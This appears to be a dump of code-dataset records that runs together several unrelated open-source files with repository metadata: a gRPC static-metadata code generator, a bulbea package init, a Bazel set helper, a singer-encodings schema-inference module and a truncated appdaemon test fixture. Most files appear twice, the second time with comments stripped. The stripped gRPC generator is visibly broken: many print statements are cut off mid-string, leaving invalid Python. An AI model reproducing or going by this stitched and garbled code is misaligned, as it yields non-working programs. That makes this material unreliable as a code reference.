elem_idxs[h] != 255 ? 
GRPC_MAKE_MDELEM(&grpc_static_mdelem_table[elem_idxs[h]], GRPC_MDELEM_STORAGE_STATIC) : GRPC_MDNULL;' print >> C, '}' print >> C print >> C, 'grpc_mdelem_data grpc_static_mdelem_table[GRPC_STATIC_MDELEM_COUNT] = {' for a, b in all_elems: print >> C, '{%s,%s},' % (slice_def(str_idx(a)), slice_def(str_idx(b))) print >> C, '};' print >> H, 'typedef enum {' for elem in METADATA_BATCH_CALLOUTS: print >> H, ' %s,' % mangle(elem, 'batch').upper() print >> H, ' GRPC_BATCH_CALLOUTS_COUNT' print >> H, '} grpc_metadata_batch_callouts_index;' print >> H print >> H, 'typedef union {' print >> H, ' struct grpc_linked_mdelem *array[GRPC_BATCH_CALLOUTS_COUNT];' print >> H, ' struct {' for elem in METADATA_BATCH_CALLOUTS: print >> H, ' struct grpc_linked_mdelem *%s;' % mangle(elem, '').lower() print >> H, ' } named;' print >> H, '} grpc_metadata_batch_callouts;' print >> H print >> H, '#define GRPC_BATCH_INDEX_OF(slice) \\' print >> H, ' (GRPC_IS_STATIC_METADATA_STRING((slice)) ? (grpc_metadata_batch_callouts_index)GPR_CLAMP(GRPC_STATIC_METADATA_INDEX((slice)), 0, GRPC_BATCH_CALLOUTS_COUNT) : GRPC_BATCH_CALLOUTS_COUNT)' print >> H print >> H, 'extern const uint8_t grpc_static_accept_encoding_metadata[%d];' % ( 1 << len(COMPRESSION_ALGORITHMS)) print >> C, 'const uint8_t grpc_static_accept_encoding_metadata[%d] = {' % ( 1 << len(COMPRESSION_ALGORITHMS)) print >> C, '0,%s' % ','.join('%d' % md_idx(elem) for elem in compression_elems) print >> C, '};' print >> C print >> H, '#define GRPC_MDELEM_ACCEPT_ENCODING_FOR_ALGORITHMS(algs) (GRPC_MAKE_MDELEM(&grpc_static_mdelem_table[grpc_static_accept_encoding_metadata[(algs)]], GRPC_MDELEM_STORAGE_STATIC))' print >> H print >> H, 'extern const uint8_t grpc_static_accept_stream_encoding_metadata[%d];' % ( 1 << len(STREAM_COMPRESSION_ALGORITHMS)) print >> C, 'const uint8_t grpc_static_accept_stream_encoding_metadata[%d] = {' % ( 1 << len(STREAM_COMPRESSION_ALGORITHMS)) print >> C, '0,%s' % ','.join( '%d' % md_idx(elem) for elem in 
stream_compression_elems) print >> C, '};' print >> H, '#define GRPC_MDELEM_ACCEPT_STREAM_ENCODING_FOR_ALGORITHMS(algs) (GRPC_MAKE_MDELEM(&grpc_static_mdelem_table[grpc_static_accept_stream_encoding_metadata[(algs)]], GRPC_MDELEM_STORAGE_STATIC))' print >> H, '#endif /* GRPC_CORE_LIB_TRANSPORT_STATIC_METADATA_H */' H.close() C.close()
30.773554
204
0.591363
import hashlib import itertools import collections import os import sys import subprocess import re import perfection CONFIG = [ 'host', 'grpc-timeout', 'grpc-internal-encoding-request', 'grpc-internal-stream-encoding-request', 'grpc-payload-bin', ':path', 'grpc-encoding', 'grpc-accept-encoding', 'user-agent', ':authority', 'grpc-message', 'grpc-status', 'grpc-server-stats-bin', 'grpc-tags-bin', 'grpc-trace-bin', 'grpc-previous-rpc-attempts', 'grpc-retry-pushback-ms', '1', '2', '3', '4', '', 'grpc.wait_for_ready', 'grpc.timeout', 'grpc.max_request_message_bytes', 'grpc.max_response_message_bytes', '/grpc.lb.v1.LoadBalancer/BalanceLoad', 'deflate', 'gzip', 'stream/gzip', (':authority', ''), (':method', 'GET'), (':method', 'POST'), (':path', '/'), (':path', '/index.html'), (':scheme', 'http'), (':scheme', 'https'), (':status', '200'), (':status', '204'), (':status', '206'), (':status', '304'), (':status', '400'), (':status', '404'), (':status', '500'), ('accept-charset', ''), ('accept-encoding', 'gzip, deflate'), ('accept-language', ''), ('accept-ranges', ''), ('accept', ''), ('access-control-allow-origin', ''), ('age', ''), ('allow', ''), ('authorization', ''), ('cache-control', ''), ('content-disposition', ''), ('content-encoding', ''), ('content-language', ''), ('content-length', ''), ('content-location', ''), ('content-range', ''), ('content-type', ''), ('cookie', ''), ('date', ''), ('etag', ''), ('expect', ''), ('expires', ''), ('from', ''), ('host', ''), ('if-match', ''), ('if-modified-since', ''), ('if-none-match', ''), ('if-range', ''), ('if-unmodified-since', ''), ('last-modified', ''), ('link', ''), ('location', ''), ('max-forwards', ''), ('proxy-authenticate', ''), ('proxy-authorization', ''), ('range', ''), ('referer', ''), ('refresh', ''), ('retry-after', ''), ('server', ''), ('set-cookie', ''), ('strict-transport-security', ''), ('transfer-encoding', ''), ('user-agent', ''), ('vary', ''), ('via', ''), ('www-authenticate', ''), ('grpc-status', '0'), 
('grpc-status', '1'), ('grpc-status', '2'), ('grpc-encoding', 'identity'), ('grpc-encoding', 'gzip'), ('grpc-encoding', 'deflate'), ('te', 'trailers'), ('content-type', 'application/grpc'), (':scheme', 'grpc'), (':method', 'PUT'), ('accept-encoding', ''), ('content-encoding', 'identity'), ('content-encoding', 'gzip'), ('lb-token', ''), ('lb-cost-bin', ''), ] METADATA_BATCH_CALLOUTS = [ (':path'), (':method'), (':status'), (':authority'), (':scheme'), ('te'), ('grpc-message'), ('grpc-status'), ('grpc-payload-bin'), ('grpc-encoding'), ('grpc-accept-encoding'), ('grpc-server-stats-bin'), ('grpc-tags-bin'), ('grpc-trace-bin'), ('content-type'), ('content-encoding'), ('accept-encoding'), ('grpc-internal-encoding-request'), ('grpc-internal-stream-encoding-request'), ('user-agent'), ('host'), ('lb-token'), ('grpc-previous-rpc-attempts'), ('grpc-retry-pushback-ms'), ] COMPRESSION_ALGORITHMS = [ 'identity', 'deflate', 'gzip', ] STREAM_COMPRESSION_ALGORITHMS = [ 'identity', 'gzip', ] def mangle(elem, name=None): xl = { '-': '_', ':': '', '/': 'slash', '.': 'dot', ',': 'comma', ' ': '_', } def m0(x): if not x: return 'empty' r = '' for c in x: put = xl.get(c, c.lower()) if not put: continue last_is_underscore = r[-1] == '_' if r else True if last_is_underscore and put == '_': continue elif len(put) > 1: if not last_is_underscore: r += '_' r += put r += '_' else: r += put if r[-1] == '_': r = r[:-1] return r def n(default, name=name): if name is None: return 'grpc_%s_' % default if name == '': return '' return 'grpc_%s_' % name if isinstance(elem, tuple): return '%s%s_%s' % (n('mdelem'), m0(elem[0]), m0(elem[1])) else: return '%s%s' % (n('mdstr'), m0(elem)) def fake_hash(elem): return hashlib.md5(elem).hexdigest()[0:8] def put_banner(files, banner): for f in files: print >> f, '/*' for line in banner: print >> f, ' * %s' % line print >> f, ' */' print >> f all_strs = list() all_elems = list() static_userdata = {} for elem in METADATA_BATCH_CALLOUTS: if elem not in all_strs: 
all_strs.append(elem) for elem in CONFIG: if isinstance(elem, tuple): if elem[0] not in all_strs: all_strs.append(elem[0]) if elem[1] not in all_strs: all_strs.append(elem[1]) if elem not in all_elems: all_elems.append(elem) else: if elem not in all_strs: all_strs.append(elem) compression_elems = [] for mask in range(1, 1 << len(COMPRESSION_ALGORITHMS)): val = ','.join(COMPRESSION_ALGORITHMS[alg] for alg in range(0, len(COMPRESSION_ALGORITHMS)) if (1 << alg) & mask) elem = ('grpc-accept-encoding', val) if val not in all_strs: all_strs.append(val) if elem not in all_elems: all_elems.append(elem) compression_elems.append(elem) static_userdata[elem] = 1 + (mask | 1) stream_compression_elems = [] for mask in range(1, 1 << len(STREAM_COMPRESSION_ALGORITHMS)): val = ','.join(STREAM_COMPRESSION_ALGORITHMS[alg] for alg in range(0, len(STREAM_COMPRESSION_ALGORITHMS)) if (1 << alg) & mask) elem = ('accept-encoding', val) if val not in all_strs: all_strs.append(val) if elem not in all_elems: all_elems.append(elem) stream_compression_elems.append(elem) static_userdata[elem] = 1 + (mask | 1) args = sys.argv[1:] H = None C = None D = None if args: if 'header' in args: H = sys.stdout else: H = open('/dev/null', 'w') if 'source' in args: C = sys.stdout else: C = open('/dev/null', 'w') if 'dictionary' in args: D = sys.stdout else: D = open('/dev/null', 'w') else: H = open( os.path.join( os.path.dirname(sys.argv[0]), '../../../src/core/lib/transport/static_metadata.h'), 'w') C = open( os.path.join( os.path.dirname(sys.argv[0]), '../../../src/core/lib/transport/static_metadata.cc'), 'w') D = open( os.path.join( os.path.dirname(sys.argv[0]), '../../../test/core/end2end/fuzzers/hpack.dictionary'), 'w') with open(sys.argv[0]) as my_source: copyright = [] for line in my_source: if line[0] != '#': break for line in my_source: if line[0] == '#': copyright.append(line) break for line in my_source: if line[0] != '#': break copyright.append(line) put_banner([H, C], [line[2:].rstrip() for line 
in copyright]) hex_bytes = [ord(c) for c in 'abcdefABCDEF0123456789'] def esc_dict(line): out = "\"" for c in line: if 32 <= c < 127: if c != ord('"'): out += chr(c) else: out += "\\\"" else: out += '\\x%02X' % c return out + "\"" put_banner([H, C], """WARNING: Auto-generated code. To make changes to this file, change tools/codegen/core/gen_static_metadata.py, and then re-run it. See metadata.h for an explanation of the interface here, and metadata.cc for an explanation of what's going on. """.splitlines()) print >> H, ' print >> H, ' print >> H print >> H, ' print >> H print >> H, ' print >> H print >> C, ' print >> C print >> C, ' print >> C print >> C, ' print >> C str_ofs = 0 id2strofs = {} for i, elem in enumerate(all_strs): id2strofs[i] = str_ofs str_ofs += len(elem) def slice_def(i): return ('{&grpc_static_metadata_refcounts[%d],' ' {{g_bytes+%d, %d}}}') % (i, id2strofs[i], len(all_strs[i])) # validate configuration for elem in METADATA_BATCH_CALLOUTS: assert elem in all_strs print >> H, ' print >> H, ('extern const grpc_slice ' 'grpc_static_slice_table[GRPC_STATIC_MDSTR_COUNT];') for i, elem in enumerate(all_strs): print >> H, '/* "%s" */' % elem print >> H, ' mangle(elem).upper(), i) print >> H print >> C, 'static uint8_t g_bytes[] = {%s};' % (','.join( '%d' % ord(c) for c in ''.join(all_strs))) print >> C print >> C, 'static void static_ref(void *unused) {}' print >> C, 'static void static_unref(void *unused) {}' print >> C, ('static const grpc_slice_refcount_vtable static_sub_vtable = ' '{static_ref, static_unref, grpc_slice_default_eq_impl, ' 'grpc_slice_default_hash_impl};') print >> H, ('extern const grpc_slice_refcount_vtable ' 'grpc_static_metadata_vtable;') print >> C, ('const grpc_slice_refcount_vtable grpc_static_metadata_vtable = ' '{static_ref, static_unref, grpc_static_slice_eq, ' 'grpc_static_slice_hash};') print >> C, ('static grpc_slice_refcount static_sub_refcnt = ' '{&static_sub_vtable, &static_sub_refcnt};') print >> H, ('extern 
grpc_slice_refcount ' 'grpc_static_metadata_refcounts[GRPC_STATIC_MDSTR_COUNT];') print >> C, ('grpc_slice_refcount ' 'grpc_static_metadata_refcounts[GRPC_STATIC_MDSTR_COUNT] = {') for i, elem in enumerate(all_strs): print >> C, ' {&grpc_static_metadata_vtable, &static_sub_refcnt},' print >> C, '};' print >> C print >> H, ' print >> H, (' ((slice).refcount != NULL && (slice).refcount->vtable == ' '&grpc_static_metadata_vtable)') print >> H print >> C, ('const grpc_slice grpc_static_slice_table[GRPC_STATIC_MDSTR_COUNT]' ' = {') for i, elem in enumerate(all_strs): print >> C, slice_def(i) + ',' print >> C, '};' print >> C print >> H, ' print >> H, (' ((int)((static_slice).refcount - ' 'grpc_static_metadata_refcounts))') print >> H print >> D, ' for i, elem in enumerate(all_strs): print >> D, '%s' % (esc_dict([len(elem)] + [ord(c) for c in elem])) for i, elem in enumerate(all_elems): print >> D, '%s' % (esc_dict([0, len(elem[0])] + [ord(c) for c in elem[0]] + [len(elem[1])] + [ord(c) for c in elem[1]])) print >> H, ' print >> H, ('extern grpc_mdelem_data ' 'grpc_static_mdelem_table[GRPC_STATIC_MDELEM_COUNT];') print >> H, ('extern uintptr_t ' 'grpc_static_mdelem_user_data[GRPC_STATIC_MDELEM_COUNT];') for i, elem in enumerate(all_elems): print >> H, '/* "%s": "%s" */' % elem print >> H, (' 'GRPC_MDELEM_STORAGE_STATIC))') % (mangle(elem).upper(), i) print >> H print >> C, ('uintptr_t grpc_static_mdelem_user_data[GRPC_STATIC_MDELEM_COUNT] ' '= {') print >> C, ' %s' % ','.join( '%d' % static_userdata.get(elem, 0) for elem in all_elems) print >> C, '};' print >> C def str_idx(s): for i, s2 in enumerate(all_strs): if s == s2: return i def md_idx(m): for i, m2 in enumerate(all_elems): if m == m2: return i def offset_trials(mink): yield 0 for i in range(1, 100): for mul in [-1, 1]: yield mul * i def perfect_hash(keys, name): p = perfection.hash_parameters(keys) def f(i, p=p): i += p.offset x = i % p.t y = i / p.t return x + p.r[y] return { 'PHASHRANGE': p.t - 1 + max(p.r), 
'PHASHNKEYS': len(p.slots), 'pyfunc': f, 'code': """ static const int8_t %(name)s_r[] = {%(r)s}; static uint32_t %(name)s_phash(uint32_t i) { i %(offset_sign)s= %(offset)d; uint32_t x = i %% %(t)d; uint32_t y = i / %(t)d; uint32_t h = x; if (y < GPR_ARRAY_SIZE(%(name)s_r)) { uint32_t delta = (uint32_t)%(name)s_r[y]; h += delta; } return h; } """ % { 'name': name, 'r': ','.join('%d' % (r if r is not None else 0) for r in p.r), 't': p.t, 'offset': abs(p.offset), 'offset_sign': '+' if p.offset > 0 else '-' } } elem_keys = [ str_idx(elem[0]) * len(all_strs) + str_idx(elem[1]) for elem in all_elems ] elem_hash = perfect_hash(elem_keys, 'elems') print >> C, elem_hash['code'] keys = [0] * int(elem_hash['PHASHRANGE']) idxs = [255] * int(elem_hash['PHASHNKEYS']) for i, k in enumerate(elem_keys): h = elem_hash['pyfunc'](k) assert keys[h] == 0 keys[h] = k idxs[h] = i print >> C, 'static const uint16_t elem_keys[] = {%s};' % ','.join( '%d' % k for k in keys) print >> C, 'static const uint8_t elem_idxs[] = {%s};' % ','.join( '%d' % i for i in idxs) print >> C print >> H, 'grpc_mdelem grpc_static_mdelem_for_static_strings(int a, int b);' print >> C, 'grpc_mdelem grpc_static_mdelem_for_static_strings(int a, int b) {' print >> C, ' if (a == -1 || b == -1) return GRPC_MDNULL;' print >> C, ' uint32_t k = (uint32_t)(a * %d + b);' % len(all_strs) print >> C, ' uint32_t h = elems_phash(k);' print >> C, ' return h < GPR_ARRAY_SIZE(elem_keys) && elem_keys[h] == k && elem_idxs[h] != 255 ? 
GRPC_MAKE_MDELEM(&grpc_static_mdelem_table[elem_idxs[h]], GRPC_MDELEM_STORAGE_STATIC) : GRPC_MDNULL;' print >> C, '}' print >> C print >> C, 'grpc_mdelem_data grpc_static_mdelem_table[GRPC_STATIC_MDELEM_COUNT] = {' for a, b in all_elems: print >> C, '{%s,%s},' % (slice_def(str_idx(a)), slice_def(str_idx(b))) print >> C, '};' print >> H, 'typedef enum {' for elem in METADATA_BATCH_CALLOUTS: print >> H, ' %s,' % mangle(elem, 'batch').upper() print >> H, ' GRPC_BATCH_CALLOUTS_COUNT' print >> H, '} grpc_metadata_batch_callouts_index;' print >> H print >> H, 'typedef union {' print >> H, ' struct grpc_linked_mdelem *array[GRPC_BATCH_CALLOUTS_COUNT];' print >> H, ' struct {' for elem in METADATA_BATCH_CALLOUTS: print >> H, ' struct grpc_linked_mdelem *%s;' % mangle(elem, '').lower() print >> H, ' } named;' print >> H, '} grpc_metadata_batch_callouts;' print >> H print >> H, ' print >> H, ' (GRPC_IS_STATIC_METADATA_STRING((slice)) ? (grpc_metadata_batch_callouts_index)GPR_CLAMP(GRPC_STATIC_METADATA_INDEX((slice)), 0, GRPC_BATCH_CALLOUTS_COUNT) : GRPC_BATCH_CALLOUTS_COUNT)' print >> H print >> H, 'extern const uint8_t grpc_static_accept_encoding_metadata[%d];' % ( 1 << len(COMPRESSION_ALGORITHMS)) print >> C, 'const uint8_t grpc_static_accept_encoding_metadata[%d] = {' % ( 1 << len(COMPRESSION_ALGORITHMS)) print >> C, '0,%s' % ','.join('%d' % md_idx(elem) for elem in compression_elems) print >> C, '};' print >> C print >> H, ' print >> H print >> H, 'extern const uint8_t grpc_static_accept_stream_encoding_metadata[%d];' % ( 1 << len(STREAM_COMPRESSION_ALGORITHMS)) print >> C, 'const uint8_t grpc_static_accept_stream_encoding_metadata[%d] = {' % ( 1 << len(STREAM_COMPRESSION_ALGORITHMS)) print >> C, '0,%s' % ','.join( '%d' % md_idx(elem) for elem in stream_compression_elems) print >> C, '};' print >> H, ' print >> H, ' H.close() C.close()
true
true
f705aa0a9cc3013d4d6d764c543ef84eb33c842d
266
py
Python
bulbea/__init__.py
saimohithnaag/StockPredictor
4caba8f042f1d87ec0b41ec8e14d3a458a7409a4
[ "Apache-2.0" ]
1,761
2017-03-09T08:51:28.000Z
2022-03-27T18:15:06.000Z
bulbea/__init__.py
saimohithnaag/StockPredictor
4caba8f042f1d87ec0b41ec8e14d3a458a7409a4
[ "Apache-2.0" ]
38
2017-03-11T11:51:16.000Z
2021-06-27T15:00:07.000Z
bulbea/__init__.py
saimohithnaag/StockPredictor
4caba8f042f1d87ec0b41ec8e14d3a458a7409a4
[ "Apache-2.0" ]
511
2017-03-12T03:49:26.000Z
2022-03-15T23:05:49.000Z
# imports - compatibility packages from __future__ import absolute_import # module imports from bulbea.entity import Share, Stock from bulbea.config import AppConfig from bulbea.app import app from bulbea.learn import sentiment __version__ = AppConfig.VERSION
24.181818
38
0.819549
from __future__ import absolute_import from bulbea.entity import Share, Stock from bulbea.config import AppConfig from bulbea.app import app from bulbea.learn import sentiment __version__ = AppConfig.VERSION
true
true
f705aa3f869f15ac85f262ae3734bf3603f18c56
2,656
bzl
Python
haskell/set.bzl
iphydf/rules_haskell
546c698cb782fd0749a3c91eb41e1f9a19c65646
[ "Apache-2.0" ]
null
null
null
haskell/set.bzl
iphydf/rules_haskell
546c698cb782fd0749a3c91eb41e1f9a19c65646
[ "Apache-2.0" ]
null
null
null
haskell/set.bzl
iphydf/rules_haskell
546c698cb782fd0749a3c91eb41e1f9a19c65646
[ "Apache-2.0" ]
null
null
null
"""Immutable sets that support efficient merging, traversal, and membership check. """ def _empty(): """Create an empty set. Returns: set, new empty set. """ return struct(_set_items = dict()) def _is_member(s, e): """Return true if `e` is in the set `s`. Args: s: The set to inspect. e: The element to search for. Result: Bool, true if `e` is in `s`, false otherwise. """ return e in s._set_items def _insert(s, e): """Insert an element into the set. Args: s: Set to insert new element into. e: The element to insert. Result: A copy of set `s` with `s` element added. """ r = dict(s._set_items) r[e] = None return struct(_set_items = r) def _mutable_insert(s, e): """The same as `set.insert`, but modifies the first argument in place. Args: s: Set to insert new element into. e: The element to insert. Result: set `s` with `s` element added. """ s._set_items[e] = None return s def _union(s0, s1): """Return union of two sets. Args: s0: One set. s1: Another set. Result: set, union of the two sets. """ r = dict(s0._set_items) r.update(s1._set_items) return struct(_set_items = r) def _mutable_union(s0, s1): """Modify set `s0` adding elements from `s1` to it. Args: s0: One set. s1: Another set. Result: set, union of the two sets. """ s0._set_items.update(s1._set_items) return s0 def _map(s, f): """Map elements of given set using a function. Args: s: Original set. f: Function to apply to elements of the set. Result: set with elements obtained by application of function `f` to the elements of `s`. """ return struct(_set_items = { f(x): None for x in s._set_items.keys()}) def _from_list(l): """Create a set containing elements from given list. Args: l: List, source of the elements for the new set. Result: set containing elements from given list. """ return (struct(_set_items = { x: None for x in l })) def _to_list(s): """Convert set into a list of its elements. Args: s: Set to convert. Returns: List of elements of the set. 
""" return s._set_items.keys() def _to_depset(s): """Similar to `set.to_list`, but produces a depset. Args: s: Set to convert. Returns: Depset of elements from the set. """ return depset(_to_list(s)) set = struct( empty = _empty, is_member = _is_member, insert = _insert, mutable_insert = _mutable_insert, union = _union, mutable_union = _mutable_union, map = _map, from_list = _from_list, to_list = _to_list, to_depset = _to_depset, )
19.386861
75
0.636672
def _empty(): return struct(_set_items = dict()) def _is_member(s, e): return e in s._set_items def _insert(s, e): r = dict(s._set_items) r[e] = None return struct(_set_items = r) def _mutable_insert(s, e): s._set_items[e] = None return s def _union(s0, s1): r = dict(s0._set_items) r.update(s1._set_items) return struct(_set_items = r) def _mutable_union(s0, s1): s0._set_items.update(s1._set_items) return s0 def _map(s, f): return struct(_set_items = { f(x): None for x in s._set_items.keys()}) def _from_list(l): return (struct(_set_items = { x: None for x in l })) def _to_list(s): return s._set_items.keys() def _to_depset(s): return depset(_to_list(s)) set = struct( empty = _empty, is_member = _is_member, insert = _insert, mutable_insert = _mutable_insert, union = _union, mutable_union = _mutable_union, map = _map, from_list = _from_list, to_list = _to_list, to_depset = _to_depset, )
true
true
f705aa53c6355389b32f15c7666bdf8d321b755f
5,052
py
Python
singer_encodings/json_schema.py
INGCRENGIFO/singer-encodings
eec3d7276bbc209b3e0d3c5e2a46c223d69e45b1
[ "Apache-2.0" ]
null
null
null
singer_encodings/json_schema.py
INGCRENGIFO/singer-encodings
eec3d7276bbc209b3e0d3c5e2a46c223d69e45b1
[ "Apache-2.0" ]
null
null
null
singer_encodings/json_schema.py
INGCRENGIFO/singer-encodings
eec3d7276bbc209b3e0d3c5e2a46c223d69e45b1
[ "Apache-2.0" ]
1
2021-05-25T14:00:25.000Z
2021-05-25T14:00:25.000Z
import re from . import csv SDC_SOURCE_FILE_COLUMN = "_sdc_source_file" SDC_SOURCE_LINENO_COLUMN = "_sdc_source_lineno" # TODO: Add additional logging # TODO: conn needs get_files and get_file_handle functions def get_schema_for_table(conn, table_spec): files = conn.get_files(table_spec['search_prefix'], table_spec['search_pattern']) if not files: return {} samples = sample_files(conn, table_spec, files) data_schema = { **generate_schema(samples, table_spec), SDC_SOURCE_FILE_COLUMN: {'type': 'string'}, SDC_SOURCE_LINENO_COLUMN: {'type': 'integer'}, csv.SDC_EXTRA_COLUMN: {'type': 'array', 'items': {'type': 'string'}}, } return { 'type': 'object', 'properties': data_schema, } def sample_file(conn, table_spec, f, sample_rate, max_records): table_name = table_spec['table_name'] plurality = "s" if sample_rate != 1 else "" samples = [] file_handle = conn.get_file_handle(f) # Add file_name to opts and flag infer_compression to support gzipped files opts = {'key_properties': table_spec['key_properties'], 'delimiter': table_spec['delimiter'], 'encoding': table_spec.get('encoding', 'utf-8'), 'file_name': f['filepath']} readers = csv.get_row_iterators(file_handle, options=opts, infer_compression=True) for reader in readers: current_row = 0 for row in reader: if (current_row % sample_rate) == 0: if row.get(csv.SDC_EXTRA_COLUMN): row.pop(csv.SDC_EXTRA_COLUMN) samples.append(row) current_row += 1 if len(samples) >= max_records: break # Empty sample to show field selection, if needed empty_file = False if len(samples) == 0: empty_file = True # Assumes all reader objects in readers have the same fieldnames samples.append({name: None for name in reader.fieldnames}) return (empty_file, samples) # pylint: disable=too-many-arguments def sample_files(conn, table_spec, files, sample_rate=1, max_records=1000, max_files=5): to_return = [] empty_samples = [] files_so_far = 0 sorted_files = sorted(files, key=lambda f: f['last_modified'], reverse=True) for f in sorted_files: empty_file, 
samples = sample_file(conn, table_spec, f, sample_rate, max_records) if empty_file: empty_samples += samples else: to_return += samples files_so_far += 1 if files_so_far >= max_files: break if not any(to_return): return empty_samples return to_return def infer(datum): """ Returns the inferred data type """ if datum is None or datum == '': return None try: int(datum) return 'integer' except (ValueError, TypeError): pass try: #numbers are NOT floats, they are DECIMALS float(datum) return 'number' except (ValueError, TypeError): pass return 'string' def count_sample(sample, counts, table_spec): for key, value in sample.items(): if key not in counts: counts[key] = {} date_overrides = table_spec.get('date_overrides', []) if key in date_overrides: datatype = "date-time" else: datatype = infer(value) if datatype is not None: counts[key][datatype] = counts[key].get(datatype, 0) + 1 return counts def pick_datatype(counts): """ If the underlying records are ONLY of type `integer`, `number`, or `date-time`, then return that datatype. If the underlying records are of type `integer` and `number` only, return `number`. Otherwise return `string`. """ to_return = 'string' if counts.get('date-time', 0) > 0: return 'date-time' if len(counts) == 1: if counts.get('integer', 0) > 0: to_return = 'integer' elif counts.get('number', 0) > 0: to_return = 'number' elif(len(counts) == 2 and counts.get('integer', 0) > 0 and counts.get('number', 0) > 0): to_return = 'number' return to_return def generate_schema(samples, table_spec): counts = {} for sample in samples: # {'name' : { 'string' : 45}} counts = count_sample(sample, counts, table_spec) for key, value in counts.items(): datatype = pick_datatype(value) if datatype == 'date-time': counts[key] = { 'anyOf': [ {'type': ['null', 'string'], 'format': 'date-time'}, {'type': ['null', 'string']} ] } else: types = ['null', datatype] if datatype != 'string': types.append('string') counts[key] = { 'type': types, } return counts
26.87234
86
0.578583
import re from . import csv SDC_SOURCE_FILE_COLUMN = "_sdc_source_file" SDC_SOURCE_LINENO_COLUMN = "_sdc_source_lineno" def get_schema_for_table(conn, table_spec): files = conn.get_files(table_spec['search_prefix'], table_spec['search_pattern']) if not files: return {} samples = sample_files(conn, table_spec, files) data_schema = { **generate_schema(samples, table_spec), SDC_SOURCE_FILE_COLUMN: {'type': 'string'}, SDC_SOURCE_LINENO_COLUMN: {'type': 'integer'}, csv.SDC_EXTRA_COLUMN: {'type': 'array', 'items': {'type': 'string'}}, } return { 'type': 'object', 'properties': data_schema, } def sample_file(conn, table_spec, f, sample_rate, max_records): table_name = table_spec['table_name'] plurality = "s" if sample_rate != 1 else "" samples = [] file_handle = conn.get_file_handle(f) opts = {'key_properties': table_spec['key_properties'], 'delimiter': table_spec['delimiter'], 'encoding': table_spec.get('encoding', 'utf-8'), 'file_name': f['filepath']} readers = csv.get_row_iterators(file_handle, options=opts, infer_compression=True) for reader in readers: current_row = 0 for row in reader: if (current_row % sample_rate) == 0: if row.get(csv.SDC_EXTRA_COLUMN): row.pop(csv.SDC_EXTRA_COLUMN) samples.append(row) current_row += 1 if len(samples) >= max_records: break empty_file = False if len(samples) == 0: empty_file = True samples.append({name: None for name in reader.fieldnames}) return (empty_file, samples) def sample_files(conn, table_spec, files, sample_rate=1, max_records=1000, max_files=5): to_return = [] empty_samples = [] files_so_far = 0 sorted_files = sorted(files, key=lambda f: f['last_modified'], reverse=True) for f in sorted_files: empty_file, samples = sample_file(conn, table_spec, f, sample_rate, max_records) if empty_file: empty_samples += samples else: to_return += samples files_so_far += 1 if files_so_far >= max_files: break if not any(to_return): return empty_samples return to_return def infer(datum): if datum is None or datum == '': return None try: 
int(datum) return 'integer' except (ValueError, TypeError): pass try: float(datum) return 'number' except (ValueError, TypeError): pass return 'string' def count_sample(sample, counts, table_spec): for key, value in sample.items(): if key not in counts: counts[key] = {} date_overrides = table_spec.get('date_overrides', []) if key in date_overrides: datatype = "date-time" else: datatype = infer(value) if datatype is not None: counts[key][datatype] = counts[key].get(datatype, 0) + 1 return counts def pick_datatype(counts): to_return = 'string' if counts.get('date-time', 0) > 0: return 'date-time' if len(counts) == 1: if counts.get('integer', 0) > 0: to_return = 'integer' elif counts.get('number', 0) > 0: to_return = 'number' elif(len(counts) == 2 and counts.get('integer', 0) > 0 and counts.get('number', 0) > 0): to_return = 'number' return to_return def generate_schema(samples, table_spec): counts = {} for sample in samples: counts = count_sample(sample, counts, table_spec) for key, value in counts.items(): datatype = pick_datatype(value) if datatype == 'date-time': counts[key] = { 'anyOf': [ {'type': ['null', 'string'], 'format': 'date-time'}, {'type': ['null', 'string']} ] } else: types = ['null', datatype] if datatype != 'string': types.append('string') counts[key] = { 'type': types, } return counts
true
true
f705aa7a111c288e8e1467878b55832e0ecc8a3a
6,992
py
Python
appdaemontestframework/automation_fixture.py
fhoekstra/Appdaemon-Test-Framework
f4b3ed1145c83228cfe4e7cbc3e351b4ac975f86
[ "MIT" ]
37
2018-08-08T10:48:13.000Z
2022-03-09T22:31:11.000Z
appdaemontestframework/automation_fixture.py
fhoekstra/Appdaemon-Test-Framework
f4b3ed1145c83228cfe4e7cbc3e351b4ac975f86
[ "MIT" ]
58
2018-10-05T13:36:57.000Z
2022-02-06T11:37:20.000Z
appdaemontestframework/automation_fixture.py
fhoekstra/Appdaemon-Test-Framework
f4b3ed1145c83228cfe4e7cbc3e351b4ac975f86
[ "MIT" ]
13
2018-12-04T19:22:23.000Z
2022-02-06T10:32:04.000Z
import warnings from inspect import isfunction, signature import pkg_resources import pytest from appdaemon.plugins.hass.hassapi import Hass from appdaemontestframework.common import AppdaemonTestFrameworkError class AutomationFixtureError(AppdaemonTestFrameworkError): pass def _instantiate_and_initialize_automation(function, automation_class, given_that, hass_functions, hass_mocks): _inject_helpers_and_call_function(function, given_that, hass_functions, hass_mocks) automation = automation_class( None, automation_class.__name__, None, None, None, None, None ) automation.initialize() given_that.mock_functions_are_cleared() return automation def _inject_helpers_and_call_function(function, given_that, hass_functions, hass_mocks): injectable_fixtures = { 'given_that': given_that, 'hass_functions': hass_functions, 'hass_mocks': hass_mocks, } def _check_valid(param): if param not in injectable_fixtures: raise AutomationFixtureError( f"'{param}' is not a valid fixture! | The only fixtures injectable in '@automation_fixture' are: {list(injectable_fixtures.keys())}") if param == 'hass_functions': warnings.warn( """ Injecting `hass_functions` into automation fixtures is deprecated. 
Replace `hass_functions` with `hass_mocks` injections and access hass_functions with `hass_mocks.hass_functions` """, DeprecationWarning) args = [] for param in signature(function).parameters: _check_valid(param) args.append(injectable_fixtures.get(param)) function(*tuple(args)) def ensure_automation_is_valid(automation_class): def function_exist_in_automation_class(func_name): return func_name in dir(automation_class) def function_has_arguments_other_than_self(func_name): func_parameters = signature(getattr(automation_class, func_name)).parameters return list(func_parameters.keys()) != ["self"] def __init___was_overridden(): return '__init__' in automation_class.__dict__ # noinspection PyPep8Naming,SpellCheckingInspection def not_subclass_of_Hass(): return not issubclass(automation_class, Hass) if not function_exist_in_automation_class('initialize'): raise AutomationFixtureError( f"'{automation_class.__name__}' has no 'initialize' function! Make sure you implemented it!") if function_has_arguments_other_than_self('initialize'): raise AutomationFixtureError( f"'{automation_class.__name__}' 'initialize' should have no arguments other than 'self'!") if __init___was_overridden(): raise AutomationFixtureError(f"'{automation_class.__name__}' should not override '__init__'") if not_subclass_of_Hass(): raise AutomationFixtureError(f"'{automation_class.__name__}' should be a subclass of 'Hass'") class _AutomationFixtureDecoratorWithoutArgs: def __init__(self, automation_classes): self.automation_classes = automation_classes for automation in self.automation_classes: 